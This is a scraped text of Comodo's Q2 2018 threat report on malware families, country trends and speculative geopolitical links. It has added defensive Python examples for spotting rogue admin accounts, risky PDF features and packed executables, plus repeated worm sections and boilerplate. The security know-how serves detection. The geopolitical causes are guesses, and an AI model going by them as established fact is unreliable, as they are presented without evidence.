Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

                                                    • 71 USA
                                                    • 72 China
                                                    • 73 South Korea
                                                    • 74 North Korea
                                                    • 75 Armenia
                                                    • 76 Belarus
                                                    • 77 Iraq
                                                    • 78 Ukraine
                                                    • 79 Croatia
                                                    • 710 Finland Russia USA
                                                      • 8 Conclusions

Global Threat Report Q2 2018 Edition

Page 42 of 73

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses the share from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives, such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans, according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
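Starter's create-then-elevate behaviour leaves a recognisable trace in the Windows Security log. The following is an added example, not Comodo's code or telemetry, that correlates account-creation events with additions to the local Administrators group over a constructed log export; the export layout, host names and account names are assumptions.

```python
"""Flag a freshly created local account that is promptly added to Administrators.

Constructed example: the records below are synthetic, shaped like fields
exported from the Windows Security log (event 4720 = user account created,
event 4732 = member added to a security-enabled local group).
"""
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"      # well-known SID of the local Administrators group
CORRELATION_WINDOW = timedelta(minutes=10)

# Constructed sample export (assumed layout): time|event_id|subject_account|target_account|group_sid
SAMPLE_EXPORT = """\
2018-06-02T09:14:03|4720|WKS-0117$|svc_remote|
2018-06-02T09:14:04|4732|WKS-0117$|svc_remote|S-1-5-32-544
2018-06-02T11:30:11|4720|alice.admin|intern01|
2018-06-02T11:30:12|4732|alice.admin|intern01|S-1-5-32-545
2018-06-03T08:02:40|4732|bob.admin|helpdesk|S-1-5-32-544
"""


def parse_export(text):
    """Turn the pipe-separated export into a list of event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, subject, target, group_sid = line.split("|")
        events.append({"time": datetime.fromisoformat(ts), "id": int(event_id),
                       "subject": subject, "target": target, "group_sid": group_sid})
    return events


def find_rogue_admins(events, window=CORRELATION_WINDOW):
    """Return one finding per addition to Administrators.

    Severity "high": the account was itself created within `window` before the
    elevation (the create-then-elevate pattern described for Starter).
    Severity "review": any other elevation, which still deserves a human look.
    """
    created_at = {}
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == 4720:
            created_at[ev["target"]] = ev["time"]
        elif ev["id"] == 4732 and ev["group_sid"] == ADMINISTRATORS_SID:
            born = created_at.get(ev["target"])
            fresh = born is not None and ev["time"] - born <= window
            findings.append({"account": ev["target"], "added_by": ev["subject"],
                             "added_at": ev["time"], "created_at": born,
                             "severity": "high" if fresh else "review"})
    return findings


if __name__ == "__main__":
    for f in find_rogue_admins(parse_export(SAMPLE_EXPORT)):
        print(f"[{f['severity']}] {f['account']} added to Administrators by "
              f"{f['added_by']} at {f['added_at'].isoformat()}")
```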


5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (.pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
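Since most Q2 exploit detections targeted PDF files, a defender's first pass on a suspect PDF is usually a static look for the features document exploits rely on. The following is an added example, not Comodo's detection logic; the two sample PDFs are constructed inline, and the list of risky names and the verdict rule are this example's assumptions.

```python
"""Static triage of a PDF for the features most document exploits rely on.

Constructed example: scans raw PDF bytes for name objects that an ordinary
document rarely needs, after undoing the #xx hex escapes PDF permits inside
names (which malicious files use to hide those keywords from naive scanners).
"""
import re

# Name objects worth a second look (this list is an assumption, not exhaustive).
RISKY_NAMES = {
    b"/JavaScript": "JavaScript action",
    b"/JS": "JavaScript code or stream reference",
    b"/OpenAction": "action runs automatically when the file is opened",
    b"/AA": "additional actions triggered by page or form events",
    b"/Launch": "launches an external application",
    b"/EmbeddedFile": "embedded file attachment",
    b"/RichMedia": "embedded Flash or other rich media",
}
HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_names(data: bytes) -> bytes:
    """Decode #xx escapes so /J#61vaScript compares equal to /JavaScript."""
    return HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def count_names(data: bytes) -> dict:
    """Count each risky name, requiring a delimiter after it so /JS != /JSomething."""
    hits = {}
    for name in RISKY_NAMES:
        count = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9_])", data))
        if count:
            hits[name.decode()] = count
    return hits


def triage_pdf(data: bytes) -> dict:
    """Return per-name hit counts, whether escapes hid a keyword, and a verdict."""
    if not data.startswith(b"%PDF-"):
        raise ValueError("missing %PDF- header")
    raw_hits = count_names(data)
    hits = count_names(normalize_names(data))
    # A keyword that only appears once escapes are decoded was deliberately hidden.
    obfuscated = any(hits[k] > raw_hits.get(k, 0) for k in hits)
    auto_trigger = "/OpenAction" in hits or "/AA" in hits
    executes = any(k in hits for k in ("/JavaScript", "/JS", "/Launch"))
    if obfuscated or (auto_trigger and executes):
        verdict = "suspicious"
    elif hits:
        verdict = "review"
    else:
        verdict = "clean"
    return {"hits": hits, "obfuscated": obfuscated, "verdict": verdict}


# Constructed samples (not real documents or malware).
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

SUSPICIOUS_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /S /J#61vaScript /JS (app.alert('constructed sample')) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PDF), ("suspicious", SUSPICIOUS_PDF)):
        result = triage_pdf(doc)
        print(label, result["verdict"], "obfuscated" if result["obfuscated"] else "")
        for key, n in result["hits"].items():
            print(f"  {key} x{n}: {RISKY_NAMES[key.encode()]}")
```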


5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
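A stock UPX build leaves its section names (UPX0, UPX1) in place, while a modified build such as MUPX typically renames them, so a defender's check has to rely on what renaming cannot hide: a section with no file data but a large virtual size (the unpacking target) and a section whose bytes have near-maximal entropy (compressed or encrypted code). The following is an added example, not Comodo's or UPX's code; the three PE images are constructed inline from a minimal header layout and are not loadable programs, and the entropy threshold is an assumption.

```python
"""Spot UPX-style packing in a PE file from its section table alone.

Constructed example: three minimal PE images are built inline (DOS stub, COFF
header, section table, raw data; no optional header) so the checks can run
offline. They are not loadable programs.
"""
import math
import random
import struct

UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2", b"UPX!"}
HIGH_ENTROPY = 7.0      # bits per byte (assumed threshold); plain x86 code sits well below it
FILE_ALIGN = 0x200


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    sections = []
    for i in range(n_sections):
        name, vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({"name": name.rstrip(b"\0"), "virtual_size": vsize,
                         "raw_size": raw_size, "entropy": shannon_entropy(raw)})
    return sections


def packer_indicators(pe: bytes):
    """Return readable indicators; an empty list means nothing packer-like was seen."""
    found = []
    for s in parse_sections(pe):
        name = s["name"].decode("latin-1")
        if s["name"] in UPX_SECTION_NAMES:
            found.append(f"UPX section name {name}")
        # Renaming sections cannot hide these two traits of a packed image:
        if s["raw_size"] == 0 and s["virtual_size"] >= 0x1000:
            found.append(f"{name}: no raw data but 0x{s['virtual_size']:x} bytes virtual (unpack target)")
        if s["raw_size"] and s["entropy"] >= HIGH_ENTROPY:
            found.append(f"{name}: entropy {s['entropy']:.2f} (compressed or encrypted)")
    return found


def build_pe(section_specs):
    """Constructed minimal PE from (name, raw_bytes, virtual_size) tuples."""
    n = len(section_specs)
    e_lfanew = 0x40
    header_len = -(-(e_lfanew + 4 + 20 + 40 * n) // FILE_ALIGN) * FILE_ALIGN
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 0, 0x0102)
    table, body, raw_ptr, vaddr = b"", b"", header_len, 0x1000
    for name, raw, vsize in section_specs:
        padded = -(-len(raw) // FILE_ALIGN) * FILE_ALIGN
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, vaddr,
                             len(raw), raw_ptr if raw else 0, 0, 0, 0, 0, 0xE0000040)
        body += raw.ljust(padded, b"\0")
        raw_ptr += padded
        vaddr += max(vsize, 0x1000)
    return (dos + b"PE\0\0" + coff + table).ljust(header_len, b"\0") + body


_rng = random.Random(2018)                               # deterministic stand-in for compressed bytes
COMPRESSED = bytes(_rng.getrandbits(8) for _ in range(4096))
PLAIN_CODE = bytes.fromhex("558bec83ec10") * 600         # repetitive prologue bytes: low entropy
PLAIN_DATA = b"Hello from a constructed sample. " * 100

SAMPLE_UPX = build_pe([(b"UPX0", b"", 0x8000), (b"UPX1", COMPRESSED, 0x1000), (b".rsrc", PLAIN_DATA, 0x1000)])
SAMPLE_MUPX = build_pe([(b".text", b"", 0x8000), (b".data", COMPRESSED, 0x1000), (b".rsrc", PLAIN_DATA, 0x1000)])
SAMPLE_CLEAN = build_pe([(b".text", PLAIN_CODE, 0x1000), (b".data", PLAIN_DATA, 0x1000)])

if __name__ == "__main__":
    for label, image in (("upx", SAMPLE_UPX), ("mupx", SAMPLE_MUPX), ("clean", SAMPLE_CLEAN)):
        print(label, packer_indicators(image) or ["no indicators"])
```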


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action, when in fact they are only intended as humor or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality, but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3, respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section, let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today, the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose, either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 All Rights Reserved. Comodo Security Solutions, Inc. Visit comodo.com.

NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531; Tel: +1 (888) 266 6361; Int: +1 (703) 581 6361; Fax: +1 (973) 777 4394; sales@comodo.com

EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800; www.comodo.co.in

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository

About Comodo Cybersecurity

Brought to you by


Global Threat Report Q2 2018 Edition

Page 43 of 73

5.1.3 Email Worms

Email worms spread by mailing copies of themselves to addresses harvested from the victim machine, and many variants combine this with other vectors, for example software exploits or removable-media autorun functionality, to travel between victim computers.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detections were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018: Russia experienced frequent Email Worm activity, Germany had the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files, including unauthorized copies of books and films, and attackers take advantage of this to disseminate malware: a p2p worm copies itself into the shared folder under attractive file names and waits for other peers to download it.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a memory-resident virus that infects .exe and .scr files and may use the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worm detections in Q2 2018.

And this timeline shows that Russia suffered not one p2p Worm outbreak but many.


5.1.5 IM Worms

Social media accounts can also be used to spread malware. One type of computer worm, the "IM" or instant messaging worm, sends malicious links through messaging channels and sites such as Facebook, either manually or automatically from a compromised account; the link typically leads to a copy of the worm itself.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of the well-known Yahos IM Worm, whose use to spread banking malware via social networks led the FBI to arrest 10 people in 2012.

